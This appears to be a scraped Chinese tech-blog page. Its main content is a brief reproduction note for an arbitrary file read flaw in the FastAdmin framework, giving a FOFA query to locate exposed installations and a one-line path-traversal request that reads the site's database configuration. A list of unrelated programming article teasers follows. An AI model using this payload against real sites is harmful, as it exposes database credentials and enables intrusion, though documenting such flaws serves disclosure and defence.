漏洞描述
FastAdmin是一个基于ThinkPHP5和Bootstrap的后台开发框架,支持权限管理、响应式开发、多语言、模块化开发、CRUD和自由可扩展等功能。
漏洞复现
FOFA
body="fastadmin.net" || body="<h1>fastadmin</h1>" && title="fastadmin"POC
IP+/index/ajax/lang?lang=../../application/database 
成功读取数据库文件
Fastadmin 前台任意文件读取漏洞
ops/2024/10/19 4:10:08/
相关文章
leetcode-238. 除自身以外数组的乘积-前n项的思想
给你一个整数数组 nums,返回 数组 answer ,其中 answer[i] 等于 nums 中除 nums[i] 之外其余各元素的乘积 。
题目数据 保证 数组 nums之中任意元素的全部前缀元素和后缀的乘积都在 32 位 整数范围内。
请 不要使用除法,且在 O(n) 时间复杂…
Ubuntu上如何优雅下载huggingface上某个gguf模型文件
OS: Ubuntu 22.04 LTS
需求:下载 Gorilla Openfunctions V2 Q2 GGUF模型到本地
https://huggingface.co/gorilla-llm/gorilla-openfunctions-v2-gguf/blob/main/gorilla-openfunctions-v2-q2_K.gguf
方法:使用 wget 命令
wget https://huggingface.c…
鸿蒙 OS 开发零基础快速入门教程
视频课程:
东西比较多, 这里主要分享一些代码和案例.
开关灯效果案例: 开灯
开关灯效果案例: 关灯
Column 和 Row 的基本用法
Entry
Component
struct Index {State message: string 张三;build() {// 一行内容Row() {// 一列内容Column() {// 文本内容Text(this.mess…
JSP(Java Server Pages)基础使用二
简单练习在jsp页面上输出出乘法口诀表
既然大家都是来看这种代码的人了,那么这种输出乘法口诀表的这种简单算法肯定是难不住大家了,所以这次主要是来说jsp的使用格式问题。
<%--Created by IntelliJ IDEA.User: ***Date: 2024/7/18Time: 11:26To ch…
leetcode每日一题day14(24.9.24)——字符串最多的子序列
思路:对于应该首要和贡献联系起来,对于什么是贡献呢,即在某种情况下,会贡献出多少种,符合要求的结果,此题属于较为基础的,对于text中的一个字符如果是非pattern中的元素,则对结果无任何影响&…
计算机科学(学习笔记四)
早期的编程方式 纸片打孔等方法 汇编语言 编程语言发展史
汇编语言也叫机器语言,是计算机的母语。但01不便于人们操作,人们为了方便操作,会输入文字指令,通过汇编器自动转成二进制指令。
但汇编码和底层硬件仍息息相关ÿ…
Android 开发每日定时任务
1、先注册一个广播
setDailyAlarm();IntentFilter filter3 new IntentFilter("UPDATERULE");registerReceiver(updateRuleReceive, filter3);
private BroadcastReceiver updateRuleReceive new BroadcastReceiver() {Overridepublic void onReceive(Context con…
封装聊天组件(fang微信聊天)
用法 图 文 视频还没写好,后期补上,因为基于微博本身的ui框架,所以有的样式会有一些问题,可能跟普通写法有一点不同,但是修改一点就可以 //自己做的假数据
<template><wbx-view style"" click"…